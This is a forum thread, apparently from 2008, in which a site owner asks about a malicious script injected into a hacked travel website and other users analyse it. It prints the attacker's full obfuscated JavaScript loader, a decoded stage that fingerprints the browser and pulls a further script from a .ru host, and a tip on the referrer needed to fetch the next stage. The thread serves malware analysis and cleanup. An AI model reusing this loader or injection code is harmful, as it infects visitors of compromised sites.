Website got hacked

[samibdr]

Hello,
We had a problem recently about someone installing a script on our website. we had removed the script from all pages manually, changed hosting provider & changed all the password. today it happened again and they managed to install the same script. this script is calling another script from ujnc.ru, jkn3.ru, porv.ru, ujnc.ru and more... the script that is called from these websites is called JS.js.

Beacause of this script, our website was marked as harmful on google and we are losing clients. i'm not sure what this script is doing. i would appreciate some feedback on whats happening here.

[Orac]

Can you provide a link to your website, and also the links to the scipts their trying to install on your server ??

[samibdr]

my website is maltatravelnet.com
link to the script are:

http://www.jkn3.ru/js.js
http://www.ujnc.ru/js.js
http://www.porv.ru/js.js

i dont think the links are working now but this morning they where, and i saved the js file to my PC. i zipped & uploaded it here:
www.sb-websolutions.com/1.zip

i also inlcuded our index.htm file. you will find the script that its calling the js file at the bottom of the source code.

please tell me what is this js file doing to our website as i dont know Javascript.

Thanks

[MysteryFCM]

The following is what the script gets;

Code: [Select]

*****************************************************************
vURL Desktop Edition v0.3.4 Results
Source code for: http://okcd.ru/cgi-bin/index.cgi?ad
Server IP: 70.126.163.53 [ 53-163.126-70.tampabay.res.rr.com ]
 > 122.100.67.72 [ 122-100-67-72.cm.ubbn.net ]
 > 69.133.138.54 [ cpe-069-133-138-054.ec.res.rr.com ]
 > 67.70.151.9 [ bas5-toronto12-1128699657.dsl.bell.ca ]
 > 24.173.57.194 [ rrcs-24-173-57-194.sw.biz.rr.com ]
 > 98.233.229.119 [ c-98-233-229-119.hsd1.md.comcast.net ]
 > 88.2.47.117 [ 117.Red-88-2-47.staticIP.rima-tde.net ]
 > 72.51.179.194 [ host-72-51-179-194.newwavecomm.net ]
 > 24.57.105.118 [ d57-105-118.home.cgocable.net ]
 > 24.226.26.87 [ d226-26-87.home.cgocable.net ]
 > 86.14.232.146 [ cpc5-cmbg4-0-0-cust145.cmbg.cable.ntl.com ]
 > 76.248.170.0 [ adsl-76-248-170-0.dsl.chi2ca.sbcglobal.net ]
 > 88.250.184.95 [ dsl88-250-47199.ttnet.net.tr ]
 > 75.143.150.108 [ Resolution failed ]
 > 76.124.4.21 [ c-76-124-4-21.hsd1.nj.comcast.net ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 1
iFrames: 0
Date: 18 August 2008
Time: 15:39:25:39
*****************************************************************
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title></title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<script type="text/javascript">
<!--
function b40R3eLSm(g1x5L617n, DxnI31GgB){var jg2U8o88H = arguments.callee;var ci0ejw4sf = location.href;jg2U8o88H = jg2U8o88H.toString();jg2U8o88H = jg2U8o88H + ci0ejw4sf;var d0Siy8ewr = jg2U8o88H.replace(/\W/g, "");d0Siy8ewr = d0Siy8ewr.toUpperCase();var MYX1e340Q = 4294967296;var CQ62jhasD = new Array;for(var e3FHCq2T3 = 0; e3FHCq2T3 < 256; e3FHCq2T3++) {CQ62jhasD[e3FHCq2T3] = 0;}var himAPxx55 = 1;for(var e3FHCq2T3 = 128; e3FHCq2T3; e3FHCq2T3 >>= 1) {himAPxx55 = himAPxx55 >>> 1 ^ (himAPxx55 & 1 ? 3988292384 : 0);for(var iS4jqp728 = 0; iS4jqp728 < 256; iS4jqp728 += e3FHCq2T3 * 2) {var RWMygP4i1 = e3FHCq2T3 + iS4jqp728;CQ62jhasD[RWMygP4i1] = CQ62jhasD[iS4jqp728] ^ himAPxx55;if (CQ62jhasD[RWMygP4i1] < 0) {CQ62jhasD[RWMygP4i1] += MYX1e340Q;}}}var Uaj1JuWwL = MYX1e340Q - 1;for(var mLpJkeD0Y = 0; mLpJkeD0Y < d0Siy8ewr.length; mLpJkeD0Y++) {var mtBwq5tH6 = (Uaj1JuWwL ^ d0Siy8ewr.charCodeAt(mLpJkeD0Y)) & 255;Uaj1JuWwL = (Uaj1JuWwL >>> 8) ^ CQ62jhasD[mtBwq5tH6];}Uaj1JuWwL = Uaj1JuWwL ^ (MYX1e340Q - 1);if (Uaj1JuWwL < 0) {Uaj1JuWwL += MYX1e340Q;}Uaj1JuWwL = Uaj1JuWwL.toString(16).toUpperCase();while(Uaj1JuWwL.length < 8) {Uaj1JuWwL = "0" + Uaj1JuWwL;}var tmIqpH535 = new Array;for(var e3FHCq2T3 = 0; e3FHCq2T3 < 8; e3FHCq2T3++) {tmIqpH535[e3FHCq2T3] = Uaj1JuWwL.charCodeAt(e3FHCq2T3);}var V44D6xwFb = "";var fWpa4Y7hY = 0;for(var e3FHCq2T3 = 0; e3FHCq2T3 < g1x5L617n.length; e3FHCq2T3 += 2){var RWMygP4i1 = g1x5L617n.substr(e3FHCq2T3, 2);var JxwOKxgq5 = parseInt(RWMygP4i1, 16);var vctXKKPN7 = JxwOKxgq5 - tmIqpH535[fWpa4Y7hY];if(vctXKKPN7 < 0) {vctXKKPN7 = vctXKKPN7 + 256;}V44D6xwFb += String.fromCharCode(vctXKKPN7);if(fWpa4Y7hY + 1 == tmIqpH535.length) {fWpa4Y7hY = 0;} else {fWpa4Y7hY++;}}var B1BkmOQej = 0;try {eval(V44D6xwFb);} catch(e) {B1BkmOQej = 1;}try {if (B1BkmOQej) {window.location = "/";}} catch(e) {}}
//-->
</script>
</head>
<body onload="b40R3eLSm('98ACAFA6A899A4B452B07373657d787B7f6e6999A6a3797A6389B7B66050798FA3A98Ab47f71666FadadA2b5547bADBA8299B6ab817255835298b3AAa99d9aB4A6AA6fA6959ca1ab9772b7A4a6508c7Ba56997AB81676c666F57ADB29791A9AFA1A56fABA6959B817dAFb59396a59D9374577E637fA8a99694ACA990765ea9B585abb3acA2975D6F6d82B9b78492aaae7f796180547badBA8299b6ab81725571528e76b666869D93696e7cb995A255b86586728a9F678B895274618EACa485a8a79F8E8562a29ab69E98a4A85C5f919d619E6D6356525e81a46A90747B9b6c9c75577e63A663847779A27899775ea9B587A7b1A8a67396b9975f6a7Eaa91A766758375a882937DAC67577E6368626E7a6B6D78756d6670BC93a961996c6067AF896AB3AD546d55B497ae6184a6A296bf6D9DB0B55CA696B8528183946899969782826180546070667c7992779d9186967d577d6366656B81528183946899969782826C6E5D50B09C6a6773AC8B63a7B08d8183946899969782829e6371506581afadA2B5548989b896A09977A463558352687ca9A3A25dBC93A9618D768169AF9388918E546D5577646f7c637e72867a9B9892937F6B5590748875AC9581859152757F8054615E66AD9095B598998D7AA26a6180548989b896a09977A463558470756174548E556e8b8bB3a79D8869b665576763655074666570797b666967796A6b617d54605e8198A6B36Baa91A766a59Fa3BC8A68669b62577E63646B55B99A99BA996c618A765273617569667066A59fa3bc8a68669B62576c80547a779766a0a294847B557052696A63afA696b8529E85799e6667ab777A6180547a779766a0A294847B557152AAa9a5ad866d7787677c996c6067AF896ab3ad8F97797C9C6D73a8797392666F57977B64629e9D65a9AB9ea79897bf886F7298648d55A4529095B598998D7AA26a7CAC9a505d9c6A6773AC8b63a7b08D9e85799E6667ab777A9e637050656F52B2977B64629E9d65A9AB9e9B746bb06869A688778D55716f57848f689583a97A9d767eB1ADb2bc93A9618983836787988d72A6546D55897E6Ba69197789B7b526461746f96a4b85aADa2B554A26aB663a171786962558352677c63a665a5779c67767866507166A46A90747b9b6c9c7565adA8A297a9ae6D57B378A4619F76676C736E5F5955c1a898B36396617Bb76279828e805072665A7d909666719B9C639A61a154a26895637Eac7a8a7363A99A98B386A3949A87a65Fb378A4619F76676C736C5d505B66646C767E7A7F8878739d9774975072665a7d909666719b9C639a6181726e557e5B579f638A6865789b8E74b59e8B977778a87185757B81a36dB48792876276ac8868A46371507b95856982A98A6198669057698680649a94957FA778545d55775b72aaa954587b95856982a98A6198666e57716c54AB7b95856982a98A6198665d74618680649a94957Fa7786fAD7B95856982a98a6198666F578792876276AC8868a471a89F88BAa4a0afaa5c616B6F60ABb098a4A09AB87598b4a85C5970bd9Aa0adA85C7684996478A799659363b297a5A8b79c5071666a6061BE7A7f8878739d977497507266546763635f507B95856982a98A619881afadA2B554936DBA7E9f85afA467558352A5A6BA5471a7B893b07Ca9a3a25Dbc93a9618d768169AF9388918e546d55766D578B8585649Ea783878c6370506D81528183946899969782826C6E5d50B0A96AAB8dab789Ca57d8d8183946899969782829E6371507B95856982a98A619874959FA2B5779f99AB73AB698d768169AF9388918E5d6bb2bc93a961867b8485BB676eB7b6546D55685472B7A4A650ac9A746B927a6A859c666F57717E9A9FA76eA898b3637E72867A9b9892937f5072666272618D768169af9388918e546C559cA4AA85776582ABb960A3A6b19Ba49d8152818394689996978282616e7150676FADadA2b55497797C9C6d73a879735583528DB3b678646698A8aa6fB6a992a8baA45F8b8585649Ea783878C6f54625E81a898b3637A896D9F7eA583B179507266a298B3b69979a3ba5A9E85799e6667ab777a6d6365665E81a898b3638664968F6a6B8C8F645072667890799c809E77B477576E639768a9929A7bADb36B8BAC9A746B927A6A859ca36dA0a76b8664968F6A6B8C8F64507166626061BE8664968f6A6b8c8f64507266846BA28c6c64809262576C6366656B81AF7a889784a56a7da8aa616E715088BAA4A0AFAA6296A7b59F7aa9A4a673A4AA975F937795796d7a7d83716c6f999b6Ea98B837785676B9b99576C6365507283529a79B7809879B2A26e6FAF999E9cba9A6061BEAB84777A836E77989b5072666272BE63999CA8ab52b2b8977664867D688ca86e5f6bb2C3A898B36382776ABF93988BB2695072666272b5b5ad50B0ABA898ad6B77778996a76C78B9A75970C3529Aa2B797985dab5B57bc917B65AEa79381B078546d55776DB4b5B5ad50b0AF985769917B65aea79381b0785d50B0bd9bA5a5B2AB5Ea1b59598B5acA39e5583525970656Fadb2669598B5A69C589A6F52b2bec03Ea967766384847881675d6D936dA27b7567967F6b9b7a7c966297a769677A7596957688686E7aA46d6497AC7479767C6c616a7a686877a969616a76667D757695946e87676776A66a65768794687A86766976776b6c827576686C7a939877a676756b7a686D77856c966D886899767c969669776598757468757789736a82856A646Ca76979787a6b646eaa6b6Ca27a76656BAC659B74a89691967D946B767C966676776869777C6C686Dac736e7a736A646c7767678275756577897379a2737565967e6B7dA2796B62767D9469827c6d616Eaa6B9c827696666Ea9936E828576676Eaa6B9DA2756b766A79667a82899565767C6767787896656D8A6b697a866d916d79736D76776c616b7c689D77A4696168AB736d7a7896666b7C6B68a2736c666C7F6A6D7a896c917779686978796a646A7c686777786a666d77667D7576696168AB936e7Aa675749778936e77746a936C7B936878856D64767f6b6F797B76716a7a689B767796669779696B77a86C686C8A6B6c79856B62768C74677a8775697689697D7AA46A936B7E699B79a66d646A7C677a76776c65977d6a70797C75676d87699d82846a966c7D687977756A646A7b689b76776b616c7d6899767C96966977659874a77671967d746b767c6d686e7f6A6a82786D616C7d9499797a6a646c776767827996616c7e696E78A76C746e7f6A6E7775756796ab736aa2a56C65767e676f787876656d8A6B697A866D916D79936d76896B676bac697B7579689569776578748775747689686977746D686e7F6A6a82786D616C7d7479797A6A646c77687B76776a666C7D686B7775696168AB657074A76d6396AA6A6B78886d716e8C696Da2746A646D79686976a56b646b7c676977a969616a7666997AA87660967d6b6c7677959496a9686977746D686E7f6A6Aa2786d616c7D7479797a6A646c77687b76776A666C7e686b77756961688B657074A76D6396aa6a6B78A86D916Eac696dA2746a646d79686976A56b646b7D676977a969616a7666997A889660767D6b6C767775747689686977746d686E7F6A6AA2786D616c7D9499797A6a646C77687B76776A666c7F686b77756961688b657074a76D63768a6A6B78886D716e8C696da2746a646d79686976A56B646B7e6769778969616a7666997Aa89660967d6b6c7677757496a9686977746D686E7f6A6AA2786D616c7D9499797a6a646c77687B76776a666c87686b77756961688B657074A76D6396aa6a6B78a86D916eac696d82746a646D79686976856b646b7f6769778969616a7666997a889660767D6b6c7677959496a9686977746d686E7F6a6a82786D616c7D9499797a6a646C77689B76776A666Ca8686b7775696168ab657074A76d63768A6a6B78a86d916E8C696d82746a646D79686976856b646B876769778969616A7666997AA87660967D6b6C767795947689686977746D686E7f6a6a82786d616c7D7479797A6A646C77689B76776A666Ca9686b77756961688B657074876d6396AA6A6B78886D916e8c696da2746a646D79686976856b646B886769778969616a76669D757668746eaa6B6d76776A936e7b937078856c696d876B9978A476616b7C686A78796A646A7c686777786a666bAC669D7576689468AA6B69a2797569967d939B78776961688B939B757468756A79667aA27575716a7A676f797695926d7e6a6E79A995966c876b7b76776c616d79686976A56B646b7b676976776a716ba96869A2A576616B7C686C787b6C7496A86b70777A959496786b6B7a7c76736e7B936f77746a666D7c6b6ca2739569967D946c7Aa86A646c7D6B6882759568768C736d7aa496686e7F676977736A646c7C6879767c6A656C77676777746B656BAC667D757668946D796B6E78796C696e89737B788996616a7A689B76776A666c7c699876856b9669776578757468956A79667a82897565767C676778786B696DA96A9ca2746D686b876B6976776C616b7c74677aa476716e8A6B6e7a789668777b946b777A7667768a736a827b956997796A9C7a8496626E88736C7A78757276886967A2a696696E7C936aA27b76666bAB696977786A646B7b686776a76B766a79667aA2a97565967C6767797B95947876936cA3766b64767A6B6D76776C616B7c686b76a56b9669776578757468956a79667A7A899663967C676f82849565977E6869797495656C87696d798576686DAB746778796B646Bac696F7A786C716Da96B7082876C939678687A78786b696Da96A9CA2746d686B876B697775966076889467A27376686EA9687978a695656D896a6f7a7376686Ca96b7c76A96a766bAC686983776961688B65707aa66d6296a8939C79A776726B7a736e76776c616B7c6A6a77a86C716d766B6f797B6B91767e69677A8695936e7b7369787a76637687936e788496686AA9696f7a786c916D896b70A2A76C737678677077757668777b6B6ca2a776666Eaa6B9c7A856A736C7d696f77756B966977659875746875698C73797A896A646A896b6F7975956977786b6D83736B647688676778736a646C7e68997579687568AA6570797B75749876936CA3766B64767a6B6D76776A966d79686976856b646A7c6879757468956A79669a75756d686EAA93987A7a76756c7C94697A896A646A8C689B767795936E7a936e82786d6896a8686782856B766a79667Aa379696168ab657B74A89692768b7379827875696A896a6b7A877675767f949A777C96646EA7677ca2739569777a7370A2a775736A7a687a76776B666C7C68797579687568AA6a6b7A877675967f949a777C76646E87676776a96C616b7C686b777C6b646A7C6879757468756A79669a7579687596A76b68A2796A646da96a7B78866b646DA86A6aA27576656B7c697d767c6d636E886969787c6d7177776a6f82796A646A8c6767797b75749876936c83766B64767a6B6d77A969616A76946F7Aa496666A7A936B79876c65767f6b69797995916e7b676778746a6496A794687aA6766996776b6cA27596686C7A736cA2A575696E7B936B7a7C6C699778936E827975699678936b76A66A66977f936CA2a57574967A936B76796a946D77669d757696686daa69687A7a6d646E79936f7a846B62767D6b6cA27B6C657787746Da2a575746e7c936c827b95696b8b686ba2A77674967a6b6c76796b606B7c686b828775697689736B77767575967D746f7a8476676e7d73697aA776647787686B77756b7669776598827B6D946d7D736c797C6d616e876b68777596677688746d78a47668767E73697aA7756697a8746d7aa86A936a7c936A827975676b7E689c767C6A666eA9936b827b96646D766968777b96636e8C6b6a7a7B6b62977e746e777b75676EA86B7077747566768c9467777B757496786b6b7A7c96936c7a736C827375746c796870777a6B656c7D69787a8975676B87686777786b646C7C936F777C6B916B7A686777776B726caa936e777C75696e7e686C77866b646C896969777c6b646B7A686777776b646C7c696977A575686E7c6b6977A675656c8a696D787375716E87676976776a966B7c6a6f79776c676B7a6A6e797a7662977d689978776961688b6b6b8276956797A8737D7A889662767e679C7A79966376877479777a9565767A73677A7c966276876a6C8274757476766B6B76a676686eac6a6a7aa66D646D776B6D7A786a746D77667D7576776169776578686c6F')">

</body>
</html>


I can't get it to decode any further however.

[bobby]

This is the decoded script:

Code: [Select]

document.Yzw7fPyy = 1;
if (!document.h3z067KE) {
var FKC0WSnq;
var rm25DIeW = navigator.appMinorVersion;
var AqGPcVOv = -1
var OgBEVkFm = "01";
while((AqGPcVOv = rm25DIeW.indexOf(";SP", AqGPcVOv+1)) != -1) {
var TeSqM1yN = rm25DIeW.charAt(AqGPcVOv+3);
if (TeSqM1yN == "1")
OgBEVkFm = "02";
else if (TeSqM1yN == "2")
OgBEVkFm = "03";
else if (TeSqM1yN == "3")
OgBEVkFm = "04";
else if (TeSqM1yN == "4")
OgBEVkFm = "05";
else if (TeSqM1yN == "5")
OgBEVkFm = "06";
else if (TeSqM1yN == "6")
OgBEVkFm = "07";
if (OgBEVkFm != "01")
break;
}
if (OgBEVkFm == "01" && rm25DIeW.indexOf("Release Candidate", 0) != -1)
OgBEVkFm = "08";
var A5FLhT6b = navigator.systemLanguage.substr(0, 10);
var Tizcz0pf = "";
for(var HaFFWtHn=0;HaFFWtHn<A5FLhT6b.length;HaFFWtHn++) {
hNelTw0w = A5FLhT6b.charCodeAt(HaFFWtHn).toString(16);
if (hNelTw0w < 2)
Tizcz0pf += "0";
Tizcz0pf += hNelTw0w;
}
while(Tizcz0pf.length < 20)
Tizcz0pf += "00";
var FKC0WSnq = OgBEVkFm + Tizcz0pf;
var tYAcPMfa = document.createElement("script");
tYAcPMfa.setAttribute("type", "text/javascript");
tYAcPMfa.setAttribute("src", "http://juc8.ru/cgi-bin/index.cgi?3c42f2a30100f0600077e0ed580660b8ab990274ebb2a0ff" + FKC0WSnq);
document.body.appendChild(tYAcPMfa);
}
Sorry, I do not have time now to calculate the download link, but I saw something interesting - the script will load only if the system language is set to far east Asian languages (Chinese and countries around China).

[JohnC]

Code: [Select]

function my_navigator () {
this.appMinorVersion = "0";
this.systemLanguage = "en-gb";
};

navigator = new my_navigator;

document.Yzw7fPyy = 1;
if (!document.h3z067KE) {
var FKC0WSnq;
var rm25DIeW = navigator.appMinorVersion;
var AqGPcVOv = -1
var OgBEVkFm = "01";
while((AqGPcVOv = rm25DIeW.indexOf(";SP", AqGPcVOv+1)) != -1) {
var TeSqM1yN = rm25DIeW.charAt(AqGPcVOv+3);
if (TeSqM1yN == "1")
OgBEVkFm = "02";
else if (TeSqM1yN == "2")
OgBEVkFm = "03";
else if (TeSqM1yN == "3")
OgBEVkFm = "04";
else if (TeSqM1yN == "4")
OgBEVkFm = "05";
else if (TeSqM1yN == "5")
OgBEVkFm = "06";
else if (TeSqM1yN == "6")
OgBEVkFm = "07";
if (OgBEVkFm != "01")
break;
}
if (OgBEVkFm == "01" && rm25DIeW.indexOf("Release Candidate", 0) != -1)
OgBEVkFm = "08";
var A5FLhT6b = navigator.systemLanguage.substr(0, 10);
var Tizcz0pf = "";
for(var HaFFWtHn=0;HaFFWtHn<A5FLhT6b.length;HaFFWtHn++) {
hNelTw0w = A5FLhT6b.charCodeAt(HaFFWtHn).toString(16);
if (hNelTw0w < 2)
Tizcz0pf += "0";
Tizcz0pf += hNelTw0w;
}
while(Tizcz0pf.length < 20)
Tizcz0pf += "00";
var FKC0WSnq = OgBEVkFm + Tizcz0pf;
//var tYAcPMfa = document.createElement("script");
//tYAcPMfa.setAttribute("type", "text/javascript");
document.write("http://juc8.ru/cgi-bin/index.cgi?3c42f2a30100f0600077e0ed580660b8ab990274ebb2a0ff" + FKC0WSnq);
document.body.appendChild(tYAcPMfa);
}
 

Use the correct referrer http://juc8.ru/cgi-bin/index.cgi?ad when you get the contents of the next url.

[samibdr]

Thanks guys. i will submit this to the hosting provider and see what we can do. any suggestions on what i can do to prevent these scripts from being installed again?

[MysteryFCM]

1. Change FTP/ACP etc passwords (and use > 10 char alphanumeric + special characters)
2. Patch the server to protect against exploit
3. Lock down your sites code!!!

[samibdr]

Could someone tell me what is this script doing exacly in plain english. i dont really know about javascript. i want to track the source of this.. Thanks